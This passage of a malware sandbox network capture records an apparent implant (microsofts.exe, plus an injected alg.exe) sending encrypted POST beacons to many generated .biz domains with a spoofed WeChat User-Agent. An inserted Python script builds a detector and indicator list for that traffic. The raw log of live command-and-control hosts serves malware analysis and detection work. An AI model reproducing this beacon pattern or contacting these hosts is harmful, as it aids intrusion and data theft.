Oct 10, 2024 10:09:13.460072041 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7fbf5af0e41356def2ae2550b3ab6eea|8.46.123.33|1728547753|1728547753|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 129 | Source IP: 192.168.2.5 | Source Port: 51620 | Destination IP: 47.129.31.212 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:13.302999973 CEST | 354 | OUT | POST /eeswgjxjcwha HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:13.303042889 CEST | 828 | OUT | Data Raw: ab dc fa 3c 96 5a 07 c9 30 03 00 00 2d 16 63 ac bb bd 8e a6 3b 0d ec 65 e2 bb d5 e3 45 19 ca 3a af 2e f8 85 64 3b e1 c5 df 82 9b ad 15 1f 3a c0 0b 09 e6 c9 e4 08 81 63 20 54 ea 7e 2b e7 79 57 fa f2 61 3f 05 5b 54 cd 62 24 0a 68 3e 3c df 65 b8 53
Data Ascii: <Z0-c;eE:.d;:c T~+yWa?[Tb$h><eS8Rh]_38B:(6~Vz%mKF(]0KcjZVe'[MaEIXQ.?~c44[x71Q B`dVqej{


Session ID: 130 | Source IP: 192.168.2.5 | Source Port: 51621 | Destination IP: 47.129.31.212 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:13.317625999 CEST | 350 | OUT | POST /ewnwyxek HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:13.317689896 CEST | 828 | OUT | Data Raw: b7 20 6a f2 56 a4 00 0a 30 03 00 00 46 38 2e 2e 04 f6 30 21 c8 fd 75 1c 6a 16 f6 37 d0 fe e8 23 b4 ef b3 d4 ed 7e 18 59 56 89 51 34 e8 f1 fd ce 98 eb 2e 8a fd c9 3f ba c1 ab d9 ed 5a 5b 33 1c 4a 57 0d dd d1 83 36 ad 09 0b 75 77 11 10 e2 c6 b0 0a
Data Ascii: jV0F8..0!uj7#~YVQ4.?Z[3JW6uwvs(&rPoW(b=vSGqh.-pqe(:2oa\N<g7k%t2]cPPO.EH+M:!t6c!~-RYe>$4KLh?;Yv_


Session ID: 131 | Source IP: 192.168.2.5 | Source Port: 51622 | Destination IP: 18.208.156.248 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:13.474539042 CEST | 358 | OUT | POST /butjufvvmucwu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:13.474562883 CEST | 828 | OUT | Data Raw: 1c 6d ba 41 d2 61 df 12 30 03 00 00 af 90 9c eb f3 e1 d9 63 77 fe da bf ff 25 9a 64 4c 25 21 57 1f f1 fc f7 74 68 11 6c 77 83 ee b4 51 c3 9b 9e 09 d6 61 ae 32 30 9b 63 83 56 4a 43 2a ab 6b ad 1c bf c9 f9 63 2e b1 05 c4 b8 22 a0 42 21 58 a0 73 13
Data Ascii: mAa0cw%dL%!WthlwQa20cVJC*kc."B!Xs*Y`QDDO1ZiY0P|B`=1H 0hs2%]/!B!'XM`RO%B?l([oWh!1+4~f~~}
Oct 10, 2024 10:09:13.943063021 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b0a39717d9ca9752faf5d884f2f0c543|8.46.123.33|1728547753|1728547753|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
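The POSTs in the sessions above share a shape that is worth capturing in a checker: a short lowercase path on a .biz host over port 80, the same WindowsWechat/QQBrowser User-Agent every time, and a body whose first 8 bytes differ per request while bytes 8..11 hold a little-endian integer equal to Content-Length minus 12 (fe 02 00 00 = 766 = 778 - 12; 30 03 00 00 = 816 = 828 - 12). The script below is an added example written for this report, not part of the Joe Sandbox output or of the malware; the sample records are constructed from the requests shown here, only the first body bytes are used because the report truncates them, and reading that 12-byte prefix as "nonce plus length" is an assumption that the arithmetic merely confirms holds for these five requests.

```python
"""Heuristic check for the beacon POSTs recorded in this report (added example)."""
import re
import struct
from dataclasses import dataclass

# Identical in every request on the page.
BEACON_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
             "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")


@dataclass
class Post:
    dst_ip: str
    host: str
    path: str
    content_length: int
    body_hex: str                 # "Data Raw" as printed; report only keeps the first bytes
    user_agent: str = BEACON_UA


# Constructed from sessions 128-132 above; the first 12 body bytes are enough here.
POSTS = [
    Post("34.211.97.45",   "bghjpy.biz",    "/csepohryabqocrsd", 778, "fd 21 97 c2 0e 71 65 60 fe 02 00 00"),
    Post("47.129.31.212",  "mnjmhp.biz",    "/eeswgjxjcwha",     828, "ab dc fa 3c 96 5a 07 c9 30 03 00 00"),
    Post("47.129.31.212",  "mnjmhp.biz",    "/ewnwyxek",         828, "b7 20 6a f2 56 a4 00 0a 30 03 00 00"),
    Post("18.208.156.248", "opowhhece.biz", "/butjufvvmucwu",    828, "1c 6d ba 41 d2 61 df 12 30 03 00 00"),
    Post("18.208.156.248", "damcprvgv.biz", "/abotv",            778, "6e f7 1a a8 8d e3 c2 ae fe 02 00 00"),
]

# Every path on the page is 5-16 lowercase letters; the bounds are a guess, not a spec.
PATH_RE = re.compile(r"^/[a-z]{4,20}$")


def parse_hex(dump: str) -> bytes:
    """Turn the space-separated 'Data Raw' dump back into bytes."""
    return bytes.fromhex(dump.replace(" ", ""))


def declared_length(body: bytes):
    """Little-endian u32 at offset 8 (assumed length field), or None if too short."""
    if len(body) < 12:
        return None
    return struct.unpack_from("<I", body, 8)[0]


def length_field_matches(body: bytes, content_length: int) -> bool:
    """The relation observed in all five POSTs: field == Content-Length - 12."""
    return declared_length(body) == content_length - 12


def is_beacon_like(p: Post) -> bool:
    """All four traits together; any one alone is far too common to alert on."""
    body = parse_hex(p.body_hex)
    return (p.host.endswith(".biz")
            and PATH_RE.match(p.path) is not None
            and p.user_agent == BEACON_UA
            and length_field_matches(body, p.content_length))


def iocs(posts):
    """Sorted (host, ip, path) triples for the posts that pass the check."""
    return sorted({(p.host, p.dst_ip, p.path) for p in posts if is_beacon_like(p)})


if __name__ == "__main__":
    for host, ip, path in iocs(POSTS):
        print(f"{host:16} {ip:16} {path}")
```

The length check is the part that turns a weak UA-plus-TLD match into something usable: a legitimate QQBrowser client posting to a .biz site will not carry Content-Length - 12 in its body header. Run it against a fuller capture before trusting the regex bounds on the path, which are drawn from only five samples.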


Session ID: 132 | Source IP: 192.168.2.5 | Source Port: 51623 | Destination IP: 18.208.156.248 | Destination Port: 80 | PID: 7120 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:13.845283985 CEST | 350 | OUT | POST /abotv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: damcprvgv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:09:13.845283985 CEST | 778 | OUT | Data Raw: 6e f7 1a a8 8d e3 c2 ae fe 02 00 00 87 23 a4 ab f1 5e 5c 01 f0 df 93 a5 47 c0 13 7b ff 98 9a 15 1e a3 f0 1f 41 42 ff c4 05 52 19 09 a7 b2 bc c6 af 5c d6 16 66 ce 57 62 fb 2f a6 b5 09 43 9e 54 aa 60 c3 fe 97 8b 84 55 7a 45 b7 50 17 bd e6 51 b2 65
Data Ascii: n#^\G{ABR\fWb/CT`UzEPQe(0 52;irK7AQ<.5"b+RmOwhfX=t&*7<+dl4`x:CG)N {baAkd0w~yL@~4X
Oct 10, 2024 10:09:14.303838968 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5bdb32055febf62b952fc7c454e6874a|8.46.123.33|1728547754|1728547754|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID: 133 | Source IP: 192.168.2.5 | Source Port: 51624 | Destination IP: 13.251.16.150 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:13.979410887 CEST | 349 | OUT | POST /dhvreng HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:13.979410887 CEST | 828 | OUT | Data Raw: 26 b8 82 50 54 2d 69 0e 30 03 00 00 f6 e7 ca c9 69 37 16 c6 26 47 2b 83 1e 71 b5 02 de 22 b2 a8 8a 19 92 bc 9a 98 26 6d 4c ae 0f a3 65 3c 7e b6 52 ff c2 0f 6d 74 52 08 b5 ed b0 51 cd 7d ab b4 24 04 98 71 56 66 a6 fd 89 17 9f 18 c9 fd 83 ec 08 46
Data Ascii: &PT-i0i7&G+q"&mLe<~RmtRQ}$qVfF#fP[uirD#@s.#Lu*2OaeJdsVFX,*BG/[xi((`Ydc0FqCsuR[*n_T
Oct 10, 2024 10:09:15.335064888 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=279831f9956f1aac606bf74dcb949b5b|8.46.123.33|1728547755|1728547755|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 134 | Source IP: 192.168.2.5 | Source Port: 51625 | Destination IP: 3.254.94.185 | Destination Port: 80 | PID: 7120 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:14.969250917 CEST | 353 | OUT | POST /plbdbgmplm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ocsvqjg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:09:14.969250917 CEST | 778 | OUT | Data Raw: 7a 3d 60 a3 04 d4 3a 76 fe 02 00 00 4d 1e bb 83 36 0d 6f e8 b6 b2 a7 dc c2 ca b8 57 54 16 f2 d2 c9 ef 6f bf 83 fd d6 c4 9d 41 bd b5 a0 30 b3 7a cc 39 51 ee 0a dd fe 86 5a 89 ab 6e 4c f6 84 0a 0f 4a dd 05 c0 fe 00 09 c4 e1 2a 5c e7 5c 5c 06 31 76
Data Ascii: z=`:vM6oWToA0z9QZnLJ*\\\1vi+#R/aK'(Iju"$\&dx7 lG>J0Z);X%d9d7'gLlCoWW>[e)v:72(f:RkeztQc
Oct 10, 2024 10:09:15.727737904 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5cff5469e0aadc59f0175a0686294711|8.46.123.33|1728547755|1728547755|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 135 | Source IP: 192.168.2.5 | Source Port: 51626 | Destination IP: 34.246.200.160 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:15.359004974 CEST | 357 | OUT | POST /cmrwepikmmer HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:15.359029055 CEST | 828 | OUT | Data Raw: 6a 91 d5 50 b6 f0 2f 1d 30 03 00 00 8d 0c 9c e8 28 15 8e dc 10 fc 8e 4c 48 4e e2 d6 11 0b db ef cc ee 8f 75 69 41 4b 74 a3 77 11 00 18 7f 81 9b 2c 8e 35 c2 5d 03 28 11 77 f0 24 27 fb bc 96 fa a8 c3 f7 ac 42 a1 53 2f 2c ca 74 84 d6 0a 93 a5 e4 b4
Data Ascii: jP/0(LHNuiAKtw,5](w$'BS/,tH+5 ?HmQLG9P]}fja@~a&+z=p>&TtjtP*hNdBPW40{U`V~%GK6)E%.DQVoP^


Session ID: 136 | Source IP: 192.168.2.5 | Source Port: 51627 | Destination IP: 34.246.200.160 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:15.370867968 CEST | 352 | OUT | POST /pwmmeoh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:15.370867968 CEST | 828 | OUT | Data Raw: 26 ca 2b 8e 7f 4e 2d 16 30 03 00 00 ca 2d e1 91 4f da 96 d1 36 cf ee d5 32 e2 5c 59 4d 70 78 97 3a 35 a3 51 d6 99 4c dd 90 9e 6f 38 cd 57 ac 9a 97 8e 07 51 08 c6 9a a9 f4 7d c3 09 30 81 81 6d 9f 15 e8 5e 20 90 f4 72 65 7b 00 50 0b cc d2 86 ad 35
Data Ascii: &+N-0-O62\YMpx:5QLo8WQ}0m^ re{P5GznD)<dN\a2!bO4^TVvEpFm(:GJ*Y{;UHSE8|rr`S7 v,4lkl!o_pB5:


Session ID: 137 | Source IP: 192.168.2.5 | Source Port: 51628 | Destination IP: 18.141.10.107 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:15.395207882 CEST | 357 | OUT | POST /dvvbbgutuwtwsq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:15.395230055 CEST | 828 | OUT | Data Raw: ad 3c fe d7 9e 41 a4 04 30 03 00 00 40 45 f3 48 9f b8 19 b8 a8 da 1c bc f6 62 32 7c d3 0e 74 0e 77 02 71 98 a1 a4 f9 2c 5e f3 23 22 81 97 bf e3 ae 4d 8e 63 59 8b 5c 85 70 6a e8 99 7b ac cd 8c df 93 b9 df ec 57 e1 fe c2 f1 1e 12 0e c6 4e a5 73 be
Data Ascii: <A0@EHb2|twq,^#"McY\pj{WNs$6zB{"V>n`'28yU}xU>yTIN6oLt;kXd [-1B1pB(MW^e%L @|ht)1d`zZEiH[pX)&5rm)0b&
Oct 10, 2024 10:09:16.746202946 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=62571ec4cc758ed5627ef16a8894107f|8.46.123.33|1728547756|1728547756|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
138 | 192.168.2.5 | 51629 | 54.244.188.177 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:16.726300001 CEST | 351 | OUT | POST /cdpttgyexq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ywffr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:09:16.726320028 CEST | 778 | OUT | Data Raw: e3 35 94 a6 4d 72 ac 33 fe 02 00 00 80 35 b5 57 ca 48 eb b3 a6 ec e1 b7 f6 5a 9f a1 ab 94 cc 95 35 30 3d 8e 88 a8 92 8e 90 14 04 99 2d d8 ea c0 35 5e 85 65 97 15 56 7b 62 1a ae 9b b7 17 84 75 24 b0 36 f7 0d 32 07 6e 2f 7a 77 10 ad ce b0 85 84 81
Data Ascii: 5Mr35WHZ50=-5^eV{bu$62n/zwUe7-(iCravMWvu;@~UcjruJ04r$Pxe:d$zD.'QnB'D(Ic,^3%t1hFNnZAs
Oct 10, 2024 10:09:17.442004919 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ef3c6a40d62203f2e6157a68d3c2a5f6|8.46.123.33|1728547757|1728547757|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
139 | 192.168.2.5 | 51630 | 13.251.16.150 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:16.770246983 CEST | 350 | OUT | POST /wgxnisegc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gcedd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:16.770277023 CEST | 828 | OUT | Data Raw: f8 06 2f ea 83 0e 5f c4 30 03 00 00 1a 31 62 f9 05 fa f1 1a 4f 58 75 f7 06 96 62 bb e9 bc e4 50 b1 bb 1e b8 63 04 54 ce 40 d8 c5 e3 77 95 4c aa eb a3 05 96 79 16 e6 e7 22 53 5f 4d 50 0e 63 e7 b3 26 ce 7d f5 cc f4 b1 8a f9 d7 7a ec fd 3f 96 01 6c
Data Ascii: /_01bOXubPcT@wLy"S_MPc&}z?l?((PV!V)Z9xmnep?BEazl6f?sX?2oN<k.EqzOAFtTm.7cwWU{z}m_ux*SNS`.
Oct 10, 2024 10:09:18.160115004 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b0deb9016d66cb3f7623bd32baaadd7a|8.46.123.33|1728547757|1728547757|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
140 | 192.168.2.5 | 51631 | 54.244.188.177 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:17.650563002 CEST | 351 | OUT | POST /tckhwxqtj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ecxbwt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:09:17.650592089 CEST | 778 | OUT | Data Raw: bd e4 5d 18 a9 1d f5 be fe 02 00 00 1e 33 52 70 7f 5d 96 c0 55 8e d2 b7 3d c3 bd b4 35 7d e1 29 e2 8b cc 85 86 87 b6 11 3d 14 d4 ed ac e7 79 bb f0 0a 8e f4 76 5d ee b7 07 9f 7d 5d a9 68 a7 b5 29 e7 b6 31 79 c6 a7 0d 97 29 8e f7 0f 08 6a 8c 36 11
Data Ascii: ]3Rp]U=5})=yv]}]h)1y)j6Gn}XTw7SiqP]b\hJK5yj/"U9[F7KwXUPA(:KN^bnm,mrnsx(F1H;kJ,2>F2M
Oct 10, 2024 10:09:18.398711920 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=09feb055645ec02ca4d6a2cecbf28bc5|8.46.123.33|1728547758|1728547758|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
141 | 192.168.2.5 | 51632 | 18.208.156.248 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:19.476519108 CEST | 350 | OUT | POST /ajbav HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jwkoeoqns.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:19.476654053 CEST | 828 | OUT | Data Raw: f5 57 14 a2 5c f0 1f 3b 30 03 00 00 49 bb 21 14 6a f3 6e 61 f8 b7 14 28 c5 42 21 b4 58 4b 4f 2f d0 16 b3 45 51 05 f1 f5 ba 3f 60 4f 3f d3 ab ea 24 22 0d a4 36 dc 5e f9 9c 83 b5 c4 62 07 da 89 dc c4 44 98 d9 5b da d4 36 e1 de 29 ca 20 fc 8b ec 65
Data Ascii: W\;0I!jna(B!XKO/EQ?`O?$"6^bD[6) evJ-kEUZ-}Zn(qd[t-F?j,g!Qu8zR{KCNd<Go}f/Oho@SDc{p?Eh
Oct 10, 2024 10:09:19.962018013 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=785ce0c77f9dd63ac55c6bd3018b8b0c|8.46.123.33|1728547759|1728547759|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
142 | 192.168.2.5 | 51633 | 44.213.104.86 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:19.706688881 CEST | 350 | OUT | POST /kpiticjpb HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: pectx.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Oct 10, 2024 10:09:19.706727028 CEST | 778 | OUT | Data Raw: 56 59 0b 6f c5 6d e8 d0 fe 02 00 00 f6 20 c4 3b fb e6 c1 5f 67 de c5 d0 b3 51 bc 58 ed 03 9b 85 f3 35 40 a6 ba e6 8c 74 b0 70 0e 6c ae f2 bc d8 24 0f d4 ab 76 4e 8d 7c 82 d4 13 ce 35 ea 69 99 f9 2e 2c be 8e 01 a9 4d 98 58 a9 9b f3 cc 96 c1 f7 57
  Data Ascii: VYom ;_gQX5@tpl$vN|5i.,MXW9W8D!-7bc1$r!5uYjC+cAQ+pv\?FT!fHxv5E ((lv;I9c;xg5U
Oct 10, 2024 10:09:20.210380077 CEST | 407 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 10 Oct 2024 08:09:20 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=94f3fc7e9eba19589fc66a474c55f4c3|8.46.123.33|1728547760|1728547760|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


